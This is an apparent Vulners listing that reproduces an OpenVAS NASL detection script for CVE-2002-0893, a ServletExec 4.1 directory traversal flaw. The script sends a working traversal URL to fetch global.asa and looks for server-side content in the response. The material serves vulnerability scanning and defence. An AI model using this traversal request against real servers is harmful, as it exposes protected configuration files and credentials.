| Reporter | Title | Published | Views | Family All 6 |
|---|---|---|---|---|
| CVE-2002-0893 | 31 Aug 200204:00 | – | cve | |
| CVE-2002-0893 | 31 Aug 200204:00 | – | cvelist | |
| EUVD-2002-0884 | 7 Oct 202500:30 | – | euvd | |
| CVE-2002-0893 | 4 Oct 200204:00 | – | nvd | |
| ServletExec 4.1 ISAPI File Reading | 3 Nov 200500:00 | – | openvas | |
| ServletExec 4.1 ISAPI com.newatlanta.servletexec.JSP10Servlet Traversal Arbitrary File Access | 22 May 200200:00 | – | nessus |
| Source | Link |
|---|---|
| ftp | www.ftp.newatlanta.com/public/4_1/patches/ |
| westpoint | www.westpoint.ltd.uk/advisories/wp-02-0006.txt |
| securityfocus | www.securityfocus.com/bid/4795 |
# SPDX-FileCopyrightText: 2002 Matt Moore
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.10959");
script_version("2023-08-01T13:29:10+0000");
script_tag(name:"last_modification", value:"2023-08-01 13:29:10 +0000 (Tue, 01 Aug 2023)");
script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
script_tag(name:"cvss_base", value:"5.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
script_cve_id("CVE-2002-0893");
script_name("ServletExec 4.1 ISAPI File Reading");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2002 Matt Moore");
script_family("Web application abuses");
script_dependencies("find_service.nasl", "httpver.nasl", "global_settings.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
script_xref(name:"URL", value:"ftp://ftp.newatlanta.com/public/4_1/patches/");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/4795");
script_xref(name:"URL", value:"http://www.westpoint.ltd.uk/advisories/wp-02-0006.txt");
script_tag(name:"solution", value:"Download Patch #9 from the linked vendor FTP.");
script_tag(name:"summary", value:"By invoking the JSPServlet directly it is possible to read the contents of
files within the webroot that would not normally be accessible (global.asa, for example.)");
script_tag(name:"insight", value:"When attempting to retrieve ASP pages it is common to see many
errors due to their similarity to JSP pages in syntax, and hence only fragments of these pages
are returned. Text files can generally be read without problem.");
script_tag(name:"qod_type", value:"remote_vul");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");
port = http_get_port(default:80);
# Uses global.asa as target to retrieve. Could be improved to use output of webmirror.nasl
url = "/servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa";
req = http_get(item:url, port:port);
res = http_keepalive_send_recv(port:port, data:req);
if(!res)
exit(0);
if("OBJECT RUNAT=Server" >< res) {
report = http_report_vuln_url(port:port, url:url);
security_message(port:port, data:report);
exit(0);
}
exit(99);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation